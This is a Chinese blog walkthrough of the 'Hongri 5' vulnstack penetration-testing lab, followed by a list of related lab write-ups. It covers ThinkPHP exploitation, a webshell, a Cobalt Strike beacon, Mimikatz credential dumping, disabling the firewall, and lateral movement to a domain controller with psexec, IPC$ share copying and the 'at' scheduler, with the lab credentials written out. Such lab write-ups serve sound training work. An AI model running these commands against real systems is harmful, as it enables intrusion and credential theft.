ATT&CK 红日5靶机渗透攻略

最新推荐文章于 2024-06-21 02:25:46 发布
最新推荐文章于 2024-06-21 02:25:46 发布
阅读量2k 收藏 5
点赞数
文章标签: 安全 web安全 渗透测试 靶机 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122718848
版权

环境搭建

下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
本次只有两台靶机 ,Win7双网卡模拟内外网

虚拟机密码

win7
sun\heart 123.com
sun\Administrator dc123.com 改为 !qazwin7

nat:192.168.8.129 (改为dhcp获取)
仅主机:192.168.138.136
到c盘phpstudy中启动phpstudy
在这里插入图片描述

2008
sun\admin 2020.com 改为!qaz2008
仅主机模式:192.168.138.138

信息收集

namp扫描

nmap -sC -sV 192.168.8.129

在这里插入图片描述

发现http80,mysql3306

网站信息收集

在这里插入图片描述

发现thinkphp v5字样

漏洞利用

thinkphp漏洞

既然是thinkphp 直接跑跑工具先
在这里插入图片描述

果然存在好几个漏洞

getshell

直接上穿一句话木马
在这里插入图片描述

解析成功
在这里插入图片描述

蚁剑链接成功
在这里插入图片描述

cs上线

启动cs,生成木马
在这里插入图片描述

上传到目标靶机
在这里插入图片描述

执行木马
在这里插入图片描述

win7上线成功
在这里插入图片描述

内网横向

内网信息收集

使用cs插件ladon
发现内网网段192.168.138.0
在这里插入图片描述

发现存在sun.com域,并且2008dc IP为192.168.138.138

在这里插入图片描述

在这里插入图片描述

mimikatiz抓密码

使用mimikatiz抓取内存密码
在这里插入图片描述

得到账密
administrator !qazwin7
在这里插入图片描述

由于dc是内网环境不出网,因此无法直接连接到cs。
可以使用win7做会话中转,dc连到win7,win7在转发到cs,但是win7开了防火墙,需要关闭防火墙后2008才能连接win7

win7提权并关闭防火墙

win7提权到system
在这里插入图片描述

提权成功
在这里插入图片描述

关闭win7防火墙

shell netsh firewall set opmode disable
在这里插入图片描述

在这里插入图片描述

dc上线

点击win7中转-监听
在这里插入图片描述

在这里插入图片描述

端口开启
在这里插入图片描述

生成木马
在这里插入图片描述

上传木马和psexec
在这里插入图片描述

使用命令执行木马
提示我拒绝访问
shell c:\psexec64.exe -accepteula \192.168.138.138 -u sun\administrator -p !qazwin7 -d -c c:\2008cs.exe
在这里插入图片描述

换个思路
使用IPCKaTeX parse error: Undefined control sequence: \ipc at position 37: …192.168.138.138\̲i̲p̲c̲ “!qazwin7” /user:administrator
在这里插入图片描述

shell copy c:\2008cs.exe \192.168.138.138\c$
在这里插入图片描述

查看时间,通过计划任务执行木马
shell net time \192.168.138.138
在这里插入图片描述

shell at \192.168.138.138 16:22:00 c:\2008cs.exe
在这里插入图片描述

dc上线成功并提权
在这里插入图片描述

在这里插入图片描述

Forest深林
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
ATT&CK实战系列——红队实战(五)
lza20001103的博客
10-17 2482
ATT&CK实战系列——红队实战(五) 文章目录ATT&CK实战系列——红队实战(五)前言靶场搭建网络配置外网渗透内网渗透内网信息收集msf反弹shell设置路由探测内网存活主机cs上线横向移动fscan扫描内网主机端口拿下域控后记 前言 前面我们接触了vulnhub靶场和CTF综合靶场系列的练习,但是只是涉及外网到提权的渗透,没有对内网的进一步的渗透,近日刚学完内网,想巩固一下内网方面的知识,刚好看到红日有一个不错的靶场,所以来想来练练手,接下来,给大家好好演示一下噢。 靶场搭建 靶场下载
红日靶场5
m0_58595840的博客
01-10 495
红日5内网渗透
红日靶场五(vulnstack5)渗透分析
qwsdfFDFSAD的博客
09-16 578
上线cs,发现为heart用户,管理员权限,svc提权到system,抓取hash和明文,没有发现有用的域用户信息。这里配置的原因是让kali可以访问win7,win7访问不了kali,模拟win7外网的环境和kali内网的环境。将kali通过frp到vps端口,并生成免杀exe,蚁剑上传执行。这里dc不出网,fscan扫描到开启了445端口,直接smb上线。访问80页面发现一个thinkphp框架的首页,工具扫描RCE。开启socks代理,通过fscan扫描内网111网段。
红日靶场-ATT&CK实战系列-红队评估(一)
最新发布
m0_66638011的博客
06-21 868
红日靶机是一系列专门为渗透测试网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场的网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构中还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
红日靶场(五)
qq_58091216的博客
05-05 2440
3) 然后,我们修改域控主机的DSRM账户登录方式。我们可以在注册表的HKLM:\System\CurrentControlSet\Control\Lsa\中新建DsrmAdminLogonBehavior项进行设置,将该新建的项中的值设为0、1、2可以分别设置不同的DSRM账户登录方式。通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.138.138,win7双网卡:192.168.135.150、192.168.138.136。
红日内网渗透靶场5(ATK&CK红队评估实战靶场五)
qq_45780190的博客
04-24 4636
环境搭建: 第一次登录会提示需要更改账号密码。 win7账号密码: sun\heart 123.com sun\Administrator dc123.com ————————————————————————————————————————————————————————————— 2008账号密码 sun\admin 2020.com 外网采用NAT模式,内网采用仅主机模式。 添加一个主机模式用于内网,设置网段为192.168.138.0. NAT用于外网,设置网段为192.168.235.0
红日靶场第五关
红队是青春
12-02 6307
红日靶场第五关 一、环境配置 靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com # win7 web需要打开C盘里的phpstudy,最好关一下防火墙 2008 sun\admin 2020.com Win7双网卡模拟内外网 VMnet2网卡:192.168.25.0/24 外网 VMn
ATT&CK手册(修改版)
09-16
5. **案例分析**:为了加深理解,手册可能会包含真实世界的攻击案例,展示攻击者如何运用ATT&CK框架中的战术和技术。 6. **防御策略**:除了描述攻击,手册还会提供防御建议,帮助组织识别和阻止这些攻击行为,包括...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御...movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取
ATT&CK框架介绍及战技术对照表
05-18
**ATT&CK框架详解** ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由MITRE公司开发的一个公开的知识库,旨在提供一个统一的视角来理解和防御网络攻击。该框架详细描述了攻击者在不同阶段可能...
ATT&CK手册.pdf
09-20
ATT&CK手册.pdf
红日靶场】vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 2022
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
红日靶场系列】ATT&CK红队评估5
weixin_45632448的博客
09-29 1694
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
红日靶场5wp
weixin_44339234的博客
11-17 870
红日靶场五wp
ATT&CK实战:红日靶场五
学生
06-19 525
已完成 0/9 [-] mysql 192.168.138.130:3306 root 123456 Error 1130: Host 'win7.sun.com' is not allowed to connect to this MySQL server。存在域 sun.com 域控 192.168.138.120 Windows Server 2008 HPC Edition 7600。上传frp 搭建socks隧道。开启win7远程桌面 并连接。获取域内所有用户的hash。连接win7远程桌面。
红日靶场五
qq_52469895的博客
03-28 223
总结现在的到的信息 有一个域sum,域内两台主机一台win7,一台dc,DC的ip为:192.168.138.138,win7双网卡:192.168.235.101、192.168.138.136。其中域控制器DC.sun.com,域管理员为Administrator。有上面信息收集可知域用户和域为用户可以填任意一个,域为sum.com。也可以用 shell whoami /user 获取sid。看到需要用户名,域和域sid,krbtgt的哈希。使用蚁剑连接之后我上传了冰蝎。thinkphp框架。
红日靶场五渗透记录
m0_63028223的博客
12-26 473
一次简单的think PHP+内网环境渗透
构建与运营企业内部ATT&CK框架
"本文档主要讨论了如何在企业内部建立和运营ATT&CK框架,以及其更新和路线图。ATT&CK是由MITRE创建的一种基于已知攻击技术的知识库,旨在帮助组织理解和防御高级持续性威胁(APT)的攻击手法。文档提到了ATT&CK的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值